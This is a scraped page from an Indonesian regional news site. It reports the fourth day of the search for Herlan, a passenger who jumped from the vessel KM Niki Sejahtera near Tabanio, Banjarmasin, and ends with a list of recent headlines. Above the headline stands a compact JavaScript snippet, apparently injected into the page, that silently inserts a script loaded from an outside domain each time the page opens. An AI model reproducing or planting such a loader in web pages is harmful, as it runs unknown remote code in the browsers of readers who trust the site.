(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Pencarian Hari ke-4, Korban Lompat dari Atas Kapal KM Niki Sejahtera Belum Ditemukan


KANALKALIMANTAN.COM, BANJARMASIN – Sejumlah tim SAR gabungan masih melakukan pencarian seorang lelaki penumpang dari KM Niki Sejahtera di perairan Tabanio Banjarmasin, pada Sabtu (3/12/2022) malam lalu.

Memasuki hari ke-4, korban bernama Herlan (32) asal Desa Sukaraja, Provinsi Banten ini tak kunjung ditemukan. Sebelumnya, pada hari Sabtu (3/12/2022) sekitar pukul 19.30 Wita seorang saksi mengatakan melihat korban melompat dari atas kapal.

Kepala Kantor Basarnas Banjarmasin Al Amrad mengatakan, telah mengerahkan beberapa personil bersama Dipolairud Polda Kalsel, KSOP Banjarmasin, dan masing-masing Polsek di Banjarmasin untuk melakukan penyisiran di sekitar lokasi kejadian.

“Untuk perkembangan hari ini operasi SAR sudah memasuki hari ke 4 Tim SAR gabungan masih melakukan pencarian sudah sedari pukul 07.30 Wita sudah berada di area pencarian,” ujar Kepala Kantor Basarnas Banjarmasin Al Amrad S.Sos, kepada kanalkalimantan.com pada Selasa (6/12/2022).

 

Kepala Kantor Basarnas Banjarmasin Al Amrad SSos. Foto : ist

Baca juga : Lompat dari Atas Kapal, Herlan Asal Banten Hilang di Perairan Tabanio

Sesuai dengan SOP Basarnas, disebutkan Amrad bahwa tim SAR gabungan akan melakukan pencarian selama 7 hari ke depan. Dirinya berharap pada pencarian hari selanjutkan dapat membuahkan hasil.

“Nanti sampai tanggal 9 kita akan optimalkan pencarian, semoga di hari ke-5 atau dari hari ini dan seterusnya pencarian dapat membuahkan hasil,” sebutnya.

Amrad juga mengungkapkan kendala di lapangan saat tim SAR gabungan melakukan penyisiran, seperti cuaca yang tak mendukung dengan hujan yang sering melanda Kota Banjarmasin.

Hal itu membuat jarak pandang untuk pemantauan situasi di lokasi kejadian menjadi terhambat.

Baca juga  : Lantik Kepala Desa Cakeru, Pj Bupati HSU Pesankan Ini

“Ada beberapa hari terjadi hujan ringan yang mengakibatkan visibility yang merupakan jarak pandang untuk pemantauan itu jadi terhambat,” ungkapnya.

Sebelumnya diketahui KM Niki Sejahtera berangkat pada Sabtu 3 Desember 2022 sekitar pukul 03.15 WIB, dalam pelayaran dari Surabaya menuju Kota Banjarmasin.

Kemudian seorang saksi mengatakan sekitar pukul 19.30 Wita bahwa satu orang penumpang berjenis kelamin laki-laki melompat dari atas kapal KM Niki Sejahtera di sekitar perairan Tabanio.

KM Niki Sejahtera sempat berupaya melakukan pencarian di sekitar lokasi kejadian, namun tidak membuahkan hasil.

Hingga akhirnya Kapten kapal langsung berkordinasi dengan agen PT Berlian Lautan Sejahtera serta Kantor SAR Banjarmasin untuk melakukan pencarian. (Kanalkalimantan.com/wanda)

Reporter  : wanda
Editor : cell


Desy Arfianty

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

7 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

8 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

9 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

9 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

10 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

12 jam ago

This website uses cookies.